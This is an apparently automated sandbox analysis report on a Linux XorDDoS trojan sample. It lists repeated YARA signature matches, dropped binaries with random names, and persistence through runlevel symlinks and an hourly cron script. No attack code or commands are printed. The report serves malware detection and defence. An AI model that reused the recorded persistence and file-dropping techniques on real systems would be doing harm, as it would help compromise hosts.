Source: Process Memory Space: iJl2Sb6qRa PID: 9805, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9816, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9827, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9838, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9849, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9860, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9871, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9882, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9893, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9904, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9915, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9926, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9937, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9948, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9959, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9970, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9981, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9994, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 10005, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 10016, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 10027, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 10038, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 10049, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 10060, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /lib/libudev.so, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/wzhmvohlxs, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wzhmvohlxs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/wzhmvohlxs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/emnaztxelb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/hiueshutol, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/hiueshutol, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/hiueshutol, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/mhvrcmaysv, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/mhvrcmaysv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/mhvrcmaysv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/lnmgbribvb, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/lnmgbribvb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/lnmgbribvb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/hgfzmygnbx, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wdcujvrbpo, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/hgfzmygnbx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/hgfzmygnbx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/wdcujvrbpo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/wdcujvrbpo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/dezqblvxuy, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/dezqblvxuy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/dezqblvxuy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/chdmwyeiia, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/chdmwyeiia, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/chdmwyeiia, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/ckxgqrmzxa, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/ckxgqrmzxa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/ckxgqrmzxa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/lsodknzpps, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/lsodknzpps, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/lsodknzpps, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/eoqlmyvucn, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/eoqlmyvucn, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/eoqlmyvucn, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/cjfywultqo, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/cjfywultqo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/cjfywultqo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/zbksjhrfms, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/zbksjhrfms, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/zbksjhrfms, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal100.troj.evad.lin@0/22@2/0

Source: /tmp/iJl2Sb6qRa (PID: 9452)

/run/gcc.pid: wxonqlgszefidbvrcsmgiiobjjsjodcn

Jump to behavior

Persistence and Installation Behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc1.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc2.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc3.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc4.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc5.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc.d/rc1.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc.d/rc2.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc.d/rc3.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc.d/rc4.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/rc.d/rc5.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRa	Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9490)	File: /etc/rc1.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRa	Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9490)	File: /etc/rc2.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRa	Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9490)	File: /etc/rc3.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRa	Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9490)	File: /etc/rc4.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRa	Jump to behavior
Source: /usr/lib/insserv/insserv (PID: 9490)	File: /etc/rc5.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRa	Jump to behavior

Sample tries to persist itself using cron

Source: /tmp/iJl2Sb6qRa (PID: 9452)	File: /etc/cron.hourly/gcc.sh	Jump to behavior
Source: /bin/dash (PID: 9474)	File: /etc/crontab	Jump to behavior
Source: /bin/sed (PID: 9479)	File: /etc/crontab	Jump to behavior

Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /lib/libudev.so	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/lsodknzpps	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/cjfywultqo	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/ckxgqrmzxa	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/dezqblvxuy	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/hgfzmygnbx	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/lnmgbribvb	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/wdcujvrbpo	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/zbksjhrfms	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/eoqlmyvucn	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/wzhmvohlxs	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/hiueshutol	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/mhvrcmaysv	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/chdmwyeiia	Jump to dropped file
Source: /tmp/iJl2Sb6qRa (PID: 9452)	File written: /usr/bin/emnaztxelb	Jump to dropped file

Source: /tmp/iJl2Sb6qRa (PID: 9452)

Shell script file created: /etc/cron.hourly/gcc.sh

Jump to dropped file

Source: /tmp/iJl2Sb6qRa (PID: 9452)	Reads from proc file: /proc/stat	Jump to behavior
